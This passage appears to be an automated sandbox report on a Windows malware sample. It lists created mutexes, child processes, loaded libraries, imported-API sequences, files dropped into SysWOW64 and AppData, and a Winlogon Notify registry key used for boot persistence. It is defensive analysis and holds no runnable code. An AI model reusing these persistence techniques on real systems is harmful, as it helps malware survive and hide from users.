Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-11
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-01
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-12
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-02
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-13
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-03
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-04
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-05
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-06
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-07
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-08
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeMutant created: \Sessions\1\BaseNamedObjects\qnd_b__-09
Source: 5SGOAKv7AR.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: 5SGOAKv7AR.exeVirustotal: Detection: 89%
Source: 5SGOAKv7AR.exeReversingLabs: Detection: 84%
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeFile read: C:\Users\user\Desktop\5SGOAKv7AR.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\5SGOAKv7AR.exe "C:\Users\user\Desktop\5SGOAKv7AR.exe"
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeProcess created: C:\Windows\SysWOW64\edsuvoov-usum.exe "C:\Windows\system32\edsuvoov-usum.exe"
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeProcess created: C:\Windows\SysWOW64\edsuvoov-usum.exe --k33p
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeProcess created: C:\Windows\SysWOW64\edsuvoov-usum.exe "C:\Windows\system32\edsuvoov-usum.exe"Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeProcess created: C:\Windows\SysWOW64\edsuvoov-usum.exe --k33pJump to behavior
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeSection loaded: rasman.dllJump to behavior
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior

Data Obfuscation

barindex
Contains functionality to check for running processes (XOR)
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,CreateFileA,RegOpe0_2_00403A19
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,CreateFileA,RegOpe1_2_00403A19
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,CreateFileA,RegOpenKeyExA,RegOpenKeyExA,lstrlenA,RegSetValueExA,RegCloseKey,RegCreate3_2_00403A19
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,Creat0_2_00403A19
Source: edsuvoov-usum.exe.0.drStatic PE information: real checksum: 0x18972 should be: 0x29cba
Source: 5SGOAKv7AR.exeStatic PE information: real checksum: 0x18972 should be: 0x29cba

Persistence and Installation Behavior

barindex
Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeExecutable created and started: C:\Windows\SysWOW64\edsuvoov-usum.exeJump to behavior
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeFile created: C:\Windows\SysWOW64\edsuvoov-usum.exeJump to dropped file
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeFile created: C:\Windows\SysWOW64\ehmehut.dllJump to dropped file
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeFile created: C:\Users\user\AppData\Roaming\osgobah.dllJump to dropped file
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeFile created: C:\Windows\SysWOW64\edsuvoov-usum.exeJump to dropped file
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeFile created: C:\Windows\SysWOW64\ehmehut.dllJump to dropped file

Boot Survival

barindex
Creates an undocumented autostart registry key
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B} 01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B} 01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567Jump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B} DLLNameJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B} DLLNameJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B} StartupJump to behavior
Source: C:\Windows\SysWOW64\edsuvoov-usum.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B} StartupJump to behavior
Source: C:\Users\user\Desktop\5SGOAKv7AR.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcat